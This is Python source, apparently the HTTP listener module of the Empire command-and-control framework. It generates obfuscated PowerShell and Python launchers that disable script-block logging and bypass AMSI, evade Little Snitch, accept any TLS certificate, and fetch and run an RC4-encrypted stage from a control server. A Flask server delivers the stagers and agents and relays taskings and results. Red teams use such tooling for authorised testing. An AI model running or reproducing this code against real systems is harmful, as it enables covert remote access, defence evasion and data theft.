helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}" stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add") stager += "('EnableScriptB'+'lockLogging',0);" stager += helpers.randomize_capitalization("$val.Add") stager += "('EnableScriptBlockInvocationLogging',0);" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"") stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']" stager += helpers.randomize_capitalization("=$val}") stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(") stager += "'signatures','N'+'onPublic,Static'" stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}};") # AMSI bypass stager += '$p6="iInitFai";$p1="System.Management";$p5="ams";$p4="iUtils";$p7="led";$p3="on.Ams";$p8="NonPub";$p9="lic,Stat";' stager += '$p10="ic";$p11=$null;$p12=$true;$p2=".Automati";[Ref].Assembly.GetType($p1+$p2+$p3+$p4).GetField($p5+$p6+$p7,$p8+$p9+$p10)' stager += '.SetValue($p11,$p12);' stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name("wc") + "= New-Object System.Net.WebClient;") if userAgent.lower() == 'default': profile = listenerOptions['DefaultProfile']['Value'] userAgent = profile.split('|')[1] stager += "$u='"+userAgent+"';" if 'https' in host: # allow for self-signed certificates for https connections stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" if userAgent.lower() != 'none': stager += helpers.randomize_capitalization('$' + helpers.generate_random_script_var_name("wc") + '.Headers.Add(') stager += "'User-Agent',$u);" if 
userAgent.lower() != 'none': stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(') stager += "'User-Agent',$u);" if proxy.lower() != 'none': if proxy.lower() == 'default': stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;") else: # TODO: implement form for other proxy stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('") stager += proxy.lower() stager += helpers.randomize_capitalization("');") stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;") if proxyCreds.lower() != 'none': if proxyCreds.lower() == "default": stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;") else: # TODO: implement form for other proxy credentials username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] if len(username.split('\\')) > 1: usr = username.split('\\')[1] domain = username.split('\\')[0] stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');" else: usr = username.split('\\')[0] stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');" stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;") #save the proxy settings to use during the entire staging process and the agent stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;" # TODO: reimplement stager retries? 
#check if we're using IPv6 listenerOptions = copy.deepcopy(listenerOptions) bindIP = listenerOptions['BindIP']['Value'] port = listenerOptions['Port']['Value'] if ':' in bindIP: if "http" in host: if "https" in host: host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port) else: host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port) # code to turn the key string into a byte array stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += "'%s');" % (stagingKey) # this is the minimized RC4 stager code from rc4.ps1 stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};') # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';" #Add custom headers if any if customHeaders != []: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] #If host header defined, assume domain fronting is in use and add a call to the base URL first #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello if headerKey.lower() == "host": stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};") stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(") stager += "\"%s\",\"%s\");" % (headerKey, headerValue) # add the RC4 packet to a cookie stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(") stager += "\"Cookie\",\"%s=%s\");" 
% (cookie, b64RoutingPacket) stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);") stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];") # decode everything and kick it over to IEX to kick off execution stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX") if obfuscate: stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())): return helpers.powershell_launcher(stager, launcher) else: # otherwise return the case-randomized stager return stager if language.startswith('py'): # Python launcherBase = 'import sys;' if "https" in host: # monkey patch ssl woohooo launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n" try: if safeChecks.lower() == 'true': launcherBase += "import re, subprocess;" launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n" launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n" launcherBase += "out, err = ps.communicate()\n" launcherBase += "if re.search(\"Little Snitch\", out):\n" launcherBase += " sys.exit()\n" except Exception as e: p = "[!] 
Error setting LittleSnitch in stager: " + str(e) print helpers.color(p, color='red') if userAgent.lower() == 'default': profile = listenerOptions['DefaultProfile']['Value'] userAgent = profile.split('|')[1] launcherBase += "import urllib2;\n" launcherBase += "UA='%s';" % (userAgent) launcherBase += "server='%s';t='%s';" % (host, stage0) # prebuild the request routing packet for the launcher routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') b64RoutingPacket = base64.b64encode(routingPacket) launcherBase += "req=urllib2.Request(server+t);\n" # add the RC4 packet to a cookie launcherBase += "req.add_header('User-Agent',UA);\n" launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket) # Add custom headers if any if customHeaders != []: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] #launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue) launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) if proxy.lower() != "none": if proxy.lower() == "default": launcherBase += "proxy = urllib2.ProxyHandler();\n" else: proto = proxy.split(':')[0] launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n" if proxyCreds != "none": if proxyCreds == "default": launcherBase += "o = urllib2.build_opener(proxy);\n" else: launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" username = proxyCreds.split(':')[0] password = proxyCreds.split(':')[1] launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" else: launcherBase += "o = urllib2.build_opener(proxy);\n" else: launcherBase += "o = urllib2.build_opener();\n" #install proxy and creds globally, so they can be used with urlopen. 
launcherBase += "urllib2.install_opener(o);\n" # download the stager and extract the IV launcherBase += "a=urllib2.urlopen(req).read();\n" launcherBase += "IV=a[0:4];" launcherBase += "data=a[4:];" launcherBase += "key=IV+'%s';" % (stagingKey) # RC4 decryption launcherBase += "S,j,out=range(256),0,[]\n" launcherBase += "for i in range(256):\n" launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += "i=j=0\n" launcherBase += "for char in data:\n" launcherBase += " i=(i+1)%256\n" launcherBase += " j=(j+S[i])%256\n" launcherBase += " S[i],S[j]=S[j],S[i]\n" launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n" launcherBase += "exec(''.join(out))" if encode: launchEncoded = base64.b64encode(launcherBase) launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded) return launcher else: return launcherBase else: print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.") else: print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!") def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None): """ Generate the stager code needed for communications with this listener. """ if not language: print helpers.color('[!] 
listeners/http generate_stager(): no language specified!') return None profile = listenerOptions['DefaultProfile']['Value'] uris = [a.strip('/') for a in profile.split('|')[0].split(',')] launcher = listenerOptions['Launcher']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] workingHours = listenerOptions['WorkingHours']['Value'] killDate = listenerOptions['KillDate']['Value'] host = listenerOptions['Host']['Value'] customHeaders = profile.split('|')[2:] # select some random URIs for staging from the main profile stage1 = random.choice(uris) stage2 = random.choice(uris) if language.lower() == 'powershell': # read in the stager base f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath)) stager = f.read() f.close() # make sure the server ends with "/" if not host.endswith("/"): host += "/" #Patch in custom Headers remove = [] if customHeaders != []: for key in customHeaders: value = key.split(":") if 'cookie' in value[0].lower() and value[1]: continue remove += value headers = ','.join(remove) #headers = ','.join(customHeaders) stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";") #patch in working hours, if any if workingHours != "": stager = stager.replace('WORKING_HOURS_REPLACE', workingHours) #Patch in the killdate, if any if killDate != "": stager = stager.replace('REPLACE_KILLDATE', killDate) # patch the server and key information stager = stager.replace('REPLACE_SERVER', host) stager = stager.replace('REPLACE_STAGING_KEY', stagingKey) stager = stager.replace('index.jsp', stage1) stager = stager.replace('index.php', stage2) randomizedStager = '' for line in stager.split("\n"): line = line.strip() # skip commented line if not line.startswith("#"): # randomize capitalization of lines without quoted strings if "\"" not in line: randomizedStager += helpers.randomize_capitalization(line) else: randomizedStager += line if obfuscate: randomizedStager = helpers.obfuscate(self.mainMenu.installPath, 
randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode: return helpers.enc_powershell(randomizedStager) elif encrypt: RC4IV = os.urandom(4) return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager) else: # otherwise just return the case-randomized stager return randomizedStager elif language.lower() == 'python': template_path = [ os.path.join(self.mainMenu.installPath, '/data/agent/stagers'), os.path.join(self.mainMenu.installPath, './data/agent/stagers')] eng = templating.TemplateEngine(template_path) template = eng.get_template('http.py') template_options = { 'working_hours': workingHours, 'kill_date': killDate, 'staging_key': stagingKey, 'profile': profile, 'stage_1': stage1, 'stage_2': stage2 } stager = template.render(template_options) stager = obfuscation.py_minify(stager) # base64 encode the stager and return it if encode: return base64.b64encode(stager) if encrypt: # return an encrypted version of the stager ("normal" staging) RC4IV = os.urandom(4) return RC4IV + encryption.rc4(RC4IV+stagingKey, stager) else: # otherwise return the standard stager return stager else: print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""): """ Generate the full agent code needed for communications with this listener. """ if not language: print helpers.color('[!] 
listeners/http generate_agent(): no language specified!') return None language = language.lower() delay = listenerOptions['DefaultDelay']['Value'] jitter = listenerOptions['DefaultJitter']['Value'] profile = listenerOptions['DefaultProfile']['Value'] lostLimit = listenerOptions['DefaultLostLimit']['Value'] killDate = listenerOptions['KillDate']['Value'] workingHours = listenerOptions['WorkingHours']['Value'] b64DefaultResponse = base64.b64encode(self.default_response()) if language == 'powershell': f = open(self.mainMenu.installPath + "./data/agent/agent.ps1") code = f.read() f.close() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = helpers.strip_powershell_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay)) code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter)) code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"") code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit)) code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"') # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code elif language == 'python': f = open(self.mainMenu.installPath + "./data/agent/agent.py") code = f.read() f.close() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = 
helpers.strip_python_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('delay = 60', 'delay = %s' % (delay)) code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter)) code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile)) code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit)) code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse)) # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate)) if workingHours != "": code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate)) return code else: print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") def generate_comms(self, listenerOptions, language=None): """ Generate just the agent communication code block needed for communications with this listener. This is so agents can easily be dynamically updated for the new listener. 
""" if language: if language.lower() == 'powershell': updateServers = """ $Script:ControlServers = @("%s"); $Script:ServerIndex = 0; """ % (listenerOptions['Host']['Value']) if listenerOptions['Host']['Value'].startswith('https'): updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" getTask = """ $script:GetTask = { try { if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) { # meta 'TASKING_REQUEST' : 4 $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4 $RoutingCookie = [Convert]::ToBase64String($RoutingPacket) # build the web request object $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; if($Script:Proxy) { $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy; } $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent) $script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)} $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + self.session_cookie + """=$RoutingCookie") # choose a random valid URI for checkin $taskURI = $script:TaskURIs | Get-Random $result = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI) $result } } catch [Net.WebException] { $script:MissedCheckins += 1 if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } """ sendMessage = """ $script:SendMessage = { param($Packets) if($Packets) { # build and encrypt the response 
packet $EncBytes = Encrypt-Bytes $Packets # build the top level RC4 "routing packet" # meta 'RESULT_POST' : 5 $RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5 if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) { # build the web request object $"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient # set the proxy settings for the WC to be the default system settings $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy(); $"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials; if($Script:Proxy) { $"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy; } $"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent) $Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)} try { # get a random posting URI $taskURI = $Script:TaskURIs | Get-Random $response = $"""+helpers.generate_random_script_var_name("wc")+""".UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket); } catch [System.Net.WebException]{ # exception posting data... if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { # restart key negotiation Start-Negotiate -S "$ser" -SK $SK -UA $ua } } } } } """ return updateServers + getTask + sendMessage elif language.lower() == 'python': updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value']) if listenerOptions['Host']['Value'].startswith('https'): updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None" sendMessage = """ def send_message(packets=None): # Requests a tasking or posts data to a randomized tasking URI. # If packets == None, the agent GETs a tasking from the control server. 
# If packets != None, the agent encrypts the passed packets and # POSTs the data to the control server. global missedCheckins global server global headers global taskURIs data = None if packets: data = ''.join(packets) # aes_encrypt_then_hmac is in stager.py encData = aes_encrypt_then_hmac(key, data) data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) else: # if we're GETing taskings, then build the routing packet to stuff info a cookie first. # meta TASKING_REQUEST = 4 routingPacket = build_routing_packet(stagingKey, sessionID, meta=4) b64routingPacket = base64.b64encode(routingPacket) headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket) taskURI = random.sample(taskURIs, 1)[0] requestUri = server + taskURI try: data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read() return ('200', data) except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 #if signaled for restaging, exit. if HTTPError.code == 401: sys.exit(0) return (HTTPError.code, '') except urllib2.URLError as URLerror: # if the server cannot be reached missedCheckins = missedCheckins + 1 return (URLerror.reason, '') return ('', '') """ return updateServers + sendMessage else: print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.") else: print helpers.color('[!] listeners/http generate_comms(): no language specified!') def start_server(self, listenerOptions): """ Threaded function that actually starts up the Flask server. 
""" # make a copy of the currently set listener options for later stager/agent generation listenerOptions = copy.deepcopy(listenerOptions) # suppress the normal Flask output log = logging.getLogger('werkzeug') log.setLevel(logging.ERROR) bindIP = listenerOptions['BindIP']['Value'] host = listenerOptions['Host']['Value'] port = listenerOptions['Port']['Value'] stagingKey = listenerOptions['StagingKey']['Value'] stagerURI = listenerOptions['StagerURI']['Value'] userAgent = self.options['UserAgent']['Value'] listenerName = self.options['Name']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] app = Flask(__name__) self.app = app @app.route('/download/<stager>') def send_stager(stager): if 'po' in stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher elif 'py' in stager: launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) return launcher else: return make_response(self.default_response(), 404) @app.route('/wp-admin/<domain>/<username>/<hostname>', methods=['GET']) def check_agent(domain,username,hostname): """ Check if an active agent already exists for a particular user, on a particular host. """ username = domain + "\\" + username result = self.mainMenu.agents.get_agents_by_username_host(username, hostname) if result: # Powershell base64 encoded command: "exit;" return "ZQB4AGkAdAA7AAoA" else: launcher = self.mainMenu.stagers.generate_launcher(listenerName,language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) launcher = helpers.enc_powershell(launcher) return launcher @app.before_request def check_ip(): """ Before every request, check if the IP address is allowed. 
""" if not self.mainMenu.agents.is_ip_allowed(request.remote_addr): listenerName = self.options['Name']['Value'] message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) @app.after_request def change_header(response): "Modify the headers response server." headers = listenerOptions['Headers']['Value'] for key in headers.split("|"): value = key.split(":") response.headers[value[0]] = value[1] return response @app.after_request def add_proxy_headers(response): "Add HTTP headers to avoid proxy caching." response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate" response.headers['Pragma'] = "no-cache" response.headers['Expires'] = "0" return response @app.route('/') @app.route('/index.html') def serve_index(): """ Return default server web page if user navigates to index. """ static_dir = self.mainMenu.installPath + "data/misc/" return make_response(self.index_page(), 200) @app.route('/welcome.png') def serve_index_helper(): """ Serves image loaded by index page. """ static_dir = self.mainMenu.installPath + "data/misc/" return send_from_directory(static_dir, 'welcome.png') @app.route('/<path:request_uri>', methods=['GET']) def handle_get(request_uri): """ Handle an agent GET request. This is used during the first step of the staging process, and when the agent requests taskings. 
""" clientIP = request.remote_addr listenerName = self.options['Name']['Value'] message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) routingPacket = None cookie = request.headers.get('Cookie') if cookie and cookie != '': try: # see if we can extract the 'routing packet' from the specified cookie location # NOTE: this can be easily moved to a paramter, another cookie value, etc. if self.session_cookie in cookie: listenerName = self.options['Name']['Value'] message = "[*] GET cookie value from {} : {}".format(clientIP, cookie) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) cookieParts = cookie.split(';') for part in cookieParts: if part.startswith(self.session_cookie): base64RoutingPacket = part[part.find('=')+1:] # decode the routing packet base64 value in the cookie routingPacket = base64.b64decode(base64RoutingPacket) except Exception as e: routingPacket = None pass if routingPacket: # parse the routing packet and process the results dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP) if dataResults and len(dataResults) > 0: for (language, results) in dataResults: if results: if results == 'STAGE0': # handle_agent_data() signals that the listener should return the stager.ps1 code # step 2 of negotiation -> return stager.ps1 (stage 1) listenerName = self.options['Name']['Value'] message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand) return 
make_response(stage, 200) elif results.startswith('ERROR:'): listenerName = self.options['Name']['Value'] message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) if 'not in cache' in results: # signal the client to restage print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)) return make_response(self.default_response(), 401) else: return make_response(self.default_response(), 200) else: # actual taskings listenerName = self.options['Name']['Value'] message = "[*] Agent from {} retrieved taskings".format(clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(results, 200) else: # dispatcher.send("[!] Results are None...", sender='listeners/http') return make_response(self.default_response(), 200) else: return make_response(self.default_response(), 200) else: listenerName = self.options['Name']['Value'] message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 200) @app.route('/<path:request_uri>', methods=['POST']) def handle_post(request_uri): """ Handle an agent POST request. 
""" stagingKey = listenerOptions['StagingKey']['Value'] clientIP = request.remote_addr requestData = request.get_data() listenerName = self.options['Name']['Value'] message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData)) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) # the routing packet should be at the front of the binary request.data # NOTE: this can also go into a cookie/etc. dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP) if dataResults and len(dataResults) > 0: for (language, results) in dataResults: if results: if results.startswith('STAGE2'): # TODO: document the exact results structure returned if ':' in clientIP: clientIP = '[' + str(clientIP) + ']' sessionID = results.split(' ')[1].strip() sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey'] listenerName = self.options['Name']['Value'] message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) hopListenerName = request.headers.get('Hop-Name') try: hopListener = helpers.get_listener_options(hopListenerName) tempListenerOptions = copy.deepcopy(listenerOptions) tempListenerOptions['Host']['Value'] = hopListener['Host']['Value'] except TypeError: tempListenerOptions = listenerOptions # step 6 of negotiation -> server sends patched agent.ps1/agent.py agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand) encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode) # TODO: wrap ^ in a routing packet? 
return make_response(encryptedAgent, 200) elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'): listenerName = self.options['Name']['Value'] message = "[!] Error returned for results by {} : {}".format(clientIP, results) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) elif results == 'VALID': listenerName = self.options['Name']['Value'] message = "[*] Valid results returned by {}".format(clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) else: return make_response(results, 200) else: return make_response(self.default_response(), 404) else: return make_response(self.default_response(), 404) try: certPath = listenerOptions['CertPath']['Value'] host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) pyversion = sys.version_info # support any version of tls pyversion = sys.version_info if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: proto = ssl.PROTOCOL_TLS elif pyversion[0] >= 3: proto = ssl.PROTOCOL_TLS else: proto = ssl.PROTOCOL_SSLv23 context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: app.run(host=bindIP, port=int(port), threaded=True) except Exception as e: print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)) listenerName = self.options['Name']['Value'] message = "[!] 
Listener startup on port {} failed: {}".format(port, e) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) def start(self, name=''): """ Start a threaded instance of self.start_server() and store it in the self.threads dictionary keyed by the listener name. """ listenerOptions = self.options if name and name != '': self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) self.threads[name].start() time.sleep(1) # returns True if the listener successfully started, false otherwise return self.threads[name].is_alive() else: name = listenerOptions['Name']['Value'] self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) self.threads[name].start() time.sleep(1) # returns True if the listener successfully started, false otherwise return self.threads[name].is_alive() def shutdown(self, name=''): """ Terminates the server thread stored in the self.threads dictionary, keyed by the listener name. """ if name and name != '': print helpers.color("[!] Killing listener '%s'" % (name)) self.threads[name].kill() else: print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])) self.threads[self.options['Name']['Value']].kill() def generate_cookie(self): """ Generate Cookie """ chars = string.letters cookie = helpers.random_string(random.randint(6,16), charset=chars) return cookie
49.755538
495
0.519677
